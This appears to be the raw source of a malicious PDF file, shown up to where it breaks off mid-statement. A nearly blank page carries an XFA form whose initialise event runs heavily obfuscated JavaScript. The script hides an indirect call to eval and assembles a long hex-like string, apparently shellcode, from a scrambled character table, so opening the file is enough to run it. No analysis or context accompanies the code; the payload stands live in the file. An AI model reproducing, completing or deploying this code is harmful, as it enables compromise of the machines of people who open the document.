%PDF-1.6
%‚„œ”
1 0 obj
<</MediaBox [0 0 1 1] /Type/Page /Contents 3 0 R /Parent 5 0 R>>
endobj
5 0 obj
<</Count 2 /Kids [1 0 R] /Type/Pages>>
endobj
8 0 obj
<</Type/EmbeddedFile /Length 86>>
stream

<xdp:xdp



 xmlns:xdp="http://ns.adobe.com/xdp/">


<config><present>
<pdf>
<interactive>1</interactive>
<version>1.6




</version>
</pdf><xdp><packets>*</packets></xdp><destination>pdf</destination></present></config>
<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/"><subform name='vewfwe'>
<pageSet><pageArea>
				<contentArea h="45pt" w="153pt" x="0.25in" y="0.42in"/>
				<medium long="13pt" short="24pt" stock="default"/></pageArea></pageSet>
		<subform h="215pt" w="543pt" name="sdfvs"><gbgreb1219904876/><field name="google"><berbg1219904876/>
<event activity="initialize">
<script contentType='application/x-javascript'>

a="p= ta2?]:swrCfKq584d^m-yRk/B+%)1L.9eMUj}06Ygnb7Wi'lFh{Q'cSIu3vVD_[E&lt;(*oAx;,";
try{
	new Element('span');
}catch(qq){
	j=google['rawValue'];
	j+='l';
	e=&#101;val(j);
}
s="";
c=b=d=a[61];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[49];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[49];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[61];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[49];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s